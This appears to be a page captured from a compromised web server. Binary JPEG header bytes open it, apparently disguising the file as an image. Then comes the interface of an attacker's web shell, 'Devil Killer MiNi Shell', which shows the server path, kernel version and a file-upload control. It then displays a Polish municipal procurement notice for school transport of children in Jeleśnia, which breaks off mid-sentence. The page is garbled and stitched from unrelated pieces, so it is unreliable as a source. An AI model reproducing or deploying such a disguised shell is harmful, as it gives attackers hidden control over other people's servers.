JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240812/0045458701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Transport dzieci z terenu gminy Jeleśnia w roku szkolnym 2024/2025 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Jeleśnia</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 072182605</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plebańska 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jeleśnia</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-340</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 (033) 8630 700</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 (033) 8636 797</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@jelesnia.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.jelesnia.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Transport dzieci z terenu gminy Jeleśnia w roku szkolnym 2024/2025 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c62ab463-820f-4fb2-9741-1b682110e7bb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00454587</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00389162/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Transport dzieci z terenu gminy Jeleśnia w roku szkolnym 2024/2025</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c62ab463-820f-4fb2-9741-1b682110e7bb <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl oraz – w szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, elektronicznej skrzynki podawczej (ESP) na ePUAP: Urząd Gminy Jeleśnia /2417042/SkrytkaESP.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”);<br/>2) W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny);<br/>3) Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia;<br/>4) Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”;<br/>5) Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza);<br/>6) Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), zwanym dalej RODO, informuję, że:<br/>1) administratorem danych osobowych osób fizycznych, jest Wójt Gminy Jeleśnia, ul. Plebańska 1, 34-340 Jeleśnia, tel. +48 (033) 8630 700;<br/>2) we wszystkich sprawach związanych z przetwarzaniem udostępnionych danych osobowych można się kontaktować z Inspektorem Ochrony Danych Gminy Jeleśnia pod adresem e mail: iod@jelesnia.pl. lub na adres siedziby Urzędu Gminy w Jeleśni;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez przeprowadzania negocjacji;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 – 19 oraz 74 – 76 ustawy Pzp;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanych z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>Dalsze zapisy w dokumentach zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.06.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zapewnienie w okresie od 02.09.2024 r. do 27.06.2025 r. usługi transportu oraz opieki w czasie przewozu uczniów zamieszkałych na terenie gminy Jeleśnia do placówek oświatowych tj.:<br/><br/>Zadanie I<br/>- dowóz uczniów do Zespołu Szkół Nr4 w Sopotni Wielkiej: 7 uczniów <br/>Trasa:<br/>1.	Sopotnia Wielka Kolonia – Sopotnia Wielka Szkoła. <br/>2.	Sopotnia Wielka Szkoła – Sopotnia Wielka Kolonia.<br/><br/>2.	W ramach tej części zamówienia:<br/>a. Transport obejmuje dowóz i odbiór dziecka z miejsca zamieszkania do placówki oświatowej i z placówki oświatowej do miejsca zamieszkania wraz z zapewnieniem opieki podczas przejazdu.<br/>b. Dowóz dzieci będzie się odbywał w dniach nauki szkolnej, zgodnie z organizacją zajęć szkolnych w roku szkolnym 2024/2025.<br/>c. Pojazdy wykorzystywane do świadczenia usługi objętej niniejszym zamówieniem muszą być w pełni sprawne, posiadać ważne badania diagnostyczne, zapewniać bezpieczeństwo i komfort pasażerów oraz umożliwiać transport dzieci w wymaganej liczbie miejsc. Pojazdy winny być oznakowane oraz muszą być w nich zapewnione odpowiednie warunki bhp i higieniczne.<br/>d. Osoba sprawująca opiekę nad przewożonymi dziećmi odpowiada za ich bezpieczeństwo podczas przewozu, a także w czasie przejścia z pojazdu do placówki i z placówki do pojazdu.<br/>f. Osoba sprawująca opiekę nad dziećmi musi być przeszkolona w zakresie udzielania pierwszej pomocy lub pierwszej pomocy medycznej lub pierwszej pomocy przedmedycznej.<br/>3.	Zamawiający wymaga, aby osoby skierowane przez wykonawcę lub podwykonawcę do wykonania czynności związanych z opieką nad dziećmi i kierowaniem pojazdów, z wykorzystaniem których świadczony będzie dowóz dzieci, były zatrudnione na podstawie stosunku pracy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60140000-1 - Nieregularny transport osób</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60100000-9 - Usługi w zakresie transportu drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty zostaną ocenione przez Zamawiającego w oparciu o kryteria: <br/>1)	Najniższa Cena (C): waga kryterium – 60,00 %;<br/>2)	Czas podstawienia pojazdu zastępczego w czasie awarii (P): waga kryterium – 40,00 %.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w czasie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zapewnienie w okresie od 02.09.2024 r. do 27.06.2025 r. usługi transportu oraz opieki w czasie przewozu uczniów zamieszkałych na terenie gminy Jeleśnia do placówek oświatowych tj.:<br/><br/>Zadanie II<br/>- dowóz uczniów do Zespołu Szkół Nr4 w Sopotni Wielkiej: 4 uczniów<br/>Trasa:<br/>1.	Sopotnia Mała – Sopotnia Wielka Szkoła. <br/>2.	Sopotnia Wielka Szkoła – Sopotnia Mała.<br/><br/>2.	W ramach tej części zamówienia:<br/>a. Transport obejmuje dowóz i odbiór dziecka z miejsca zamieszkania do placówki oświatowej i z placówki oświatowej do miejsca zamieszkania wraz z zapewnieniem opieki podczas przejazdu.<br/>b. Dowóz dzieci będzie się odbywał w dniach nauki szkolnej, zgodnie z organizacją zajęć szkolnych w roku szkolnym 2024/2025.<br/>c. Pojazdy wykorzystywane do świadczenia usługi objętej niniejszym zamówieniem muszą być w pełni sprawne, posiadać ważne badania diagnostyczne, zapewniać bezpieczeństwo i komfort pasażerów oraz umożliwiać transport dzieci w wymaganej liczbie miejsc. Pojazdy winny być oznakowane oraz muszą być w nich zapewnione odpowiednie warunki bhp i higieniczne.<br/>d. Osoba sprawująca opiekę nad przewożonymi dziećmi odpowiada za ich bezpieczeństwo podczas przewozu, a także w czasie przejścia z pojazdu do placówki i z placówki do pojazdu.<br/>f. Osoba sprawująca opiekę nad dziećmi musi być przeszkolona w zakresie udzielania pierwszej pomocy lub pierwszej pomocy medycznej lub pierwszej pomocy przedmedycznej.<br/>3.	Zamawiający wymaga, aby osoby skierowane przez wykonawcę lub podwykonawcę do wykonania czynności związanych z opieką nad dziećmi i kierowaniem pojazdów, z wykorzystaniem których świadczony będzie dowóz dzieci, były zatrudnione na podstawie stosunku pracy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60140000-1 - Nieregularny transport osób</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60100000-9 - Usługi w zakresie transportu drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty zostaną ocenione przez Zamawiającego w oparciu o kryteria: <br/>1)	Najniższa Cena (C): waga kryterium – 60,00 %;<br/>2)	Czas podstawienia pojazdu zastępczego w czasie awarii (P): waga kryterium – 40,00 %.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w czasie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zapewnienie w okresie od 02.09.2024 r. do 27.06.2025 r. usługi transportu oraz opieki w czasie przewozu uczniów zamieszkałych na terenie gminy Jeleśnia do placówek oświatowych tj.:<br/><br/>Zadanie III<br/>- dowóz uczniów do Zespołu Szkół Nr3 w Krzyżowej i Zespołu Szkół Nr1 w Jeleśni: 7 uczniów.<br/>Trasa:<br/>1.	Krzyżówki – Krzyżowa Szkoła. <br/>2.	Krzyżowa – Jeleśnia Rynek Szkoła.<br/>3.	Jeleśnia Rynek Szkoła – Krzyżowa.<br/>4.	Krzyżowa Szkoła – Krzyżówki.<br/><br/>2.	W ramach tej części zamówienia:<br/>a. Transport obejmuje dowóz i odbiór dziecka z miejsca zamieszkania do placówki oświatowej i z placówki oświatowej do miejsca zamieszkania wraz z zapewnieniem opieki podczas przejazdu.<br/>b. Dowóz dzieci będzie się odbywał w dniach nauki szkolnej, zgodnie z organizacją zajęć szkolnych w roku szkolnym 2024/2025.<br/>c. Pojazdy wykorzystywane do świadczenia usługi objętej niniejszym zamówieniem muszą być w pełni sprawne, posiadać ważne badania diagnostyczne, zapewniać bezpieczeństwo i komfort pasażerów oraz umożliwiać transport dzieci w wymaganej liczbie miejsc. Pojazdy winny być oznakowane oraz muszą być w nich zapewnione odpowiednie warunki bhp i higieniczne.<br/>d. Osoba sprawująca opiekę nad przewożonymi dziećmi odpowiada za ich bezpieczeństwo podczas przewozu, a także w czasie przejścia z pojazdu do placówki i z placówki do pojazdu.<br/>f. Osoba sprawująca opiekę nad dziećmi musi być przeszkolona w zakresie udzielania pierwszej pomocy lub pierwszej pomocy medycznej lub pierwszej pomocy przedmedycznej.<br/>3.	Zamawiający wymaga, aby osoby skierowane przez wykonawcę lub podwykonawcę do wykonania czynności związanych z opieką nad dziećmi i kierowaniem pojazdów, z wykorzystaniem których świadczony będzie dowóz dzieci, były zatrudnione na podstawie stosunku pracy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60140000-1 - Nieregularny transport osób</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60100000-9 - Usługi w zakresie transportu drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty zostaną ocenione przez Zamawiającego w oparciu o kryteria: <br/>1)	Najniższa Cena (C): waga kryterium – 60,00 %;<br/>2)	Czas podstawienia pojazdu zastępczego w czasie awarii (P): waga kryterium – 40,00 %.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w czasie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zapewnienie w okresie od 02.09.2024 r. do 27.06.2025 r. usługi transportu oraz opieki w czasie przewozu uczniów zamieszkałych na terenie gminy Jeleśnia do placówek oświatowych 